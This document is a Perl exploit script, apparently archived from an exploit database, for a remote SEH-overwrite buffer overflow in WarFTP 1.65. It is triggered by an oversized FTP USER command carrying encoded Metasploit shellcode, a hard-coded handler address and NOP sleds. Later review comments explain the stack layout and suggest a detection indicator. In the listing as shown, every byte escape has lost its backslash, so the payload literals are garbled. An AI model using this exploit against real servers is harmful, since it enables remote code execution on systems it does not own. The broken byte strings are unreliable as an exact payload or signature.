# Title : WarFTP 1.65 (USER) Remote Buffer Overflow SEH Overflow Exploit
# Published : 2007-03-15
# Author : Umesh Wanve
# ===============================================================================================
# WarFTP 1.65 (USER) Remote Buffer Overflow SEH overflow Exploit
# By Umesh Wanve
# ===============================================================================================
#
# Date : 15-03-2007
#
# Tested on Windows 2000 SP4 Server English
# Windows 2000 SP4 Professional English
#
# You can replace shellcode with your favourite one :)
#
#
# Well, I used a different technique here. Rather than overwriting EIP, I used the SEH handler overwrite
# method. Pretty simple.
#
# Stack ---> buffer === AAAAA.........
# |
# Pointer to next SEH === Short Jump to Hellcode
# |
# SEH Handler === Pop, Pop, Ret (ws2help.dll win2000 sp4)
# |
# NOP Sled === Nop Sled
# |
# Hellcode === Hell.........
#
#
#
#
# P.S: This was written for educational purposes. Use it at your own risk. The author will not be
# responsible for any damage.
#
# Always Thanks to Metasploit.
#
#==================================================================================================
#!/usr/bin/perl
use IO::Socket;
#use strict;
# win32_exec - EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
# NOTE(review): every string literal in this listing is written without a
# backslash ("xeb" rather than "\xeb", "x90", "rn"), so as rendered here Perl
# evaluates them as plain ASCII text, not as the bytes the surrounding comments
# describe. Read the literals below as documentation of the original payload
# layout; a byte-level detection signature must not be derived from this
# rendering, which differs from what the original file put on the wire.
#
# Stage 1: the encoded shellcode (Alpha2-encoded, stated size 330 bytes per the
# comment above). Kept opaque on purpose; it is the code that runs once the
# overwritten SEH handler is invoked.
my($shellcode)=
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49".
"x49x49x49x49x49x49x49x37x49x49x49x49x51x5ax6ax42".
"x58x50x30x41x31x42x41x6bx41x41x52x32x41x42x41x32".
"x42x41x30x42x41x58x50x38x41x42x75x38x69x79x6cx4a".
"x48x67x34x47x70x77x70x53x30x6ex6bx67x35x45x6cx4c".
"x4bx73x4cx74x45x31x68x54x41x68x6fx6cx4bx70x4fx57".
"x68x6ex6bx71x4fx45x70x65x51x5ax4bx67x39x4cx4bx50".
"x34x4cx4bx77x71x68x6ex75x61x4bx70x4ex79x6ex4cx4d".
"x54x4bx70x72x54x65x57x69x51x49x5ax46x6dx37x71x6f".
"x32x4ax4bx58x74x77x4bx41x44x44x64x35x54x72x55x7a".
"x45x6cx4bx53x6fx51x34x37x71x48x6bx51x76x4cx4bx76".
"x6cx50x4bx6ex6bx71x4fx67x6cx37x71x68x6bx4cx4bx65".
"x4cx4cx4bx64x41x58x6bx4bx39x53x6cx75x74x46x64x78".
"x43x74x71x49x50x30x64x6ex6bx43x70x44x70x4cx45x4f".
"x30x41x68x44x4cx4ex6bx63x70x44x4cx6ex6bx30x70x65".
"x4cx4ex4dx6cx4bx30x68x75x58x7ax4bx35x59x4cx4bx4d".
"x50x58x30x37x70x47x70x77x70x6cx4bx65x38x57x4cx31".
"x4fx66x51x48x76x65x30x70x56x4dx59x4ax58x6ex63x69".
"x50x31x6bx76x30x55x38x5ax50x4ex6ax36x64x63x6fx61".
"x78x6ax38x4bx4ex6cx4ax54x4ex76x37x6bx4fx4bx57x70".
"x63x51x71x32x4cx52x43x37x70x42";
# Stage 2: value that lands in the "pointer to next SEH" record slot. Per the
# author's comment it is a short forward jump over the handler pointer into
# the NOP sled that precedes the shellcode.
my($pointer_to_next_seh)="xebx06x90x90"; # Short Jump
# Stage 3: value that lands in the SEH handler slot, an address inside
# ws2help.dll on Windows 2000 SP4 (see the header). Being a hard-coded module
# address it is specific to that exact build; this is the classic SEH-overwrite
# primitive that SafeSEH/SEHOP on later Windows releases are designed to stop.
my($seh_handler)="xa9x11x02x75"; #pop, pop, ret
#(ws2help.dll win2000 sp4)
# `use strict` is commented out above, so $socket and $exploit are undeclared
# package globals. The target host is taken straight from $ARGV[0] with no
# validation; a missing argument passes an undef PeerAddr to the constructor.
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "21",
Proto => "TCP"))
{
# One FTP USER command built by concatenation. The order of the pieces IS the
# stack layout sketched in the header: filler, saved-EIP slot, NOPs, next-SEH,
# handler, NOPs, shellcode, NOPs, line terminator. With the stated 330-byte
# shellcode the USER argument is roughly 930 bytes -- far beyond any
# legitimate username -- which is the simplest network-level indicator of
# this attack and the natural thing to alert on or reject at the server.
$exploit = "USER ". #Vulnerable Command
("A"x485). #Buffer
"BBBB". #EIP Overwrites here :)
("x90" x 80). #Garbage
$pointer_to_next_seh.
$seh_handler.
("x90" x 10).
$shellcode. #ur code
("x90" x 10).
"rn"; # intended as the FTP CRLF terminator; see the escape note at the top
# The print result is not checked. The one-second sleep gives the server time
# to read the line before the close tears the connection down.
print $socket $exploit;
sleep(1);
close($socket);
}
else
{
# Same missing-backslash issue as above: the trailing "n" was presumably "\n".
print "Cannot connect to $ARGV[0]:21n";
}